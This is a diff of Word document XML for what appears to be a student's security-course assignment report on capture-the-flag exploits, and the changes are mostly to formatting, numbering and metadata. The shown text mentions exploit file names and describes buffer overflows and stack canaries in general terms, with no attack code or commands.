+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="503A7FF4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1D104654"/>
@@ -7647,17 +8911,250 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5F4F23D5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="525E7236"/>
+    <w:lvl w:ilvl="0" w:tplc="F59A9E38">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Bahnschrift" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Bahnschrift" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7F732779"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8A3A44F2"/>
+    <w:lvl w:ilvl="0" w:tplc="C87CC888">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="980887045">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="998310189">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1861771583">
     <w:abstractNumId w:val="1"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="48648188">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="795412564">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="863788344">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>
@@ -8062,7 +9559,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00930E42"/>
+    <w:rsid w:val="006326ED"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -8283,6 +9780,17 @@
       <w:sz w:val="56"/>
       <w:szCs w:val="56"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="006326ED"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>
@@ -8583,6 +10091,23 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x0101007BCD34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
     <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
@@ -8760,24 +10285,25 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C90A798-53B0-4DA2-8331-5495FD97601A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -8793,22 +10319,4 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
 </file>
--- a/CA1/CA1_INF226_fha040.docx
+++ b/CA1/CA1_INF226_fha040.docx
@@ -25,6 +25,16 @@
           <w:szCs w:val="40"/>
         </w:rPr>
         <w:t>Compulsory Assignment I: Report</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -647,33 +657,7 @@
           <w:szCs w:val="32"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Exploit Code: ctf0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.py</w:t>
+        <w:t>Exploit Code: ctf00.py</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2339,33 +2323,7 @@
           <w:szCs w:val="32"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Exploit Code: ctf0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.py</w:t>
+        <w:t>Exploit Code: ctf01.py</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3886,15 +3844,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Because of this, an attacker can overflow the buffer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">and redirect execution onto </w:t>
+        <w:t xml:space="preserve">Because of this, an attacker can overflow the buffer and redirect execution onto </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8515,7 +8465,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> On Linux, it is often represented as a </w:t>
       </w:r>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId22" w:anchor=":~:text=On%20Linux%2C%20stack%20canaries%20end%20in%2000.%20This%20is%20so%20that%20they%20null%2Dterminate%20any%20strings%20in%20case%20you%20make%20a%20mistake%20when%20using%20print%20functions%2C%20but%20it%20also%20makes%20them%20much%20easier%20to%20spot." w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8523,25 +8473,7 @@
             <w:kern w:val="0"/>
             <w14:ligatures w14:val="none"/>
           </w:rPr>
-          <w:t>random-looking value tha</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-            <w:kern w:val="0"/>
-            <w14:ligatures w14:val="none"/>
-          </w:rPr>
-          <w:t>t</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-            <w:kern w:val="0"/>
-            <w14:ligatures w14:val="none"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> ends in 00</w:t>
+          <w:t>random-looking value that ends in 00</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -8770,6 +8702,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -9333,15 +9266,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">using </w:t>
+        <w:t xml:space="preserve"> using </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9495,31 +9420,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> on </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>seemingly random points of execution</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, making it </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">challenging to </w:t>
+        <w:t xml:space="preserve"> on seemingly random points of execution, making it challenging to </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11859,15 +11760,6 @@
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x0101007BCD34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
     <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
@@ -12045,6 +11937,15 @@
 </ct:contentTypeSchema>
 </file>
 
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
+</file>
+
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
   <ds:schemaRefs>
@@ -12056,14 +11957,6 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C90A798-53B0-4DA2-8331-5495FD97601A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -12079,4 +11972,12 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>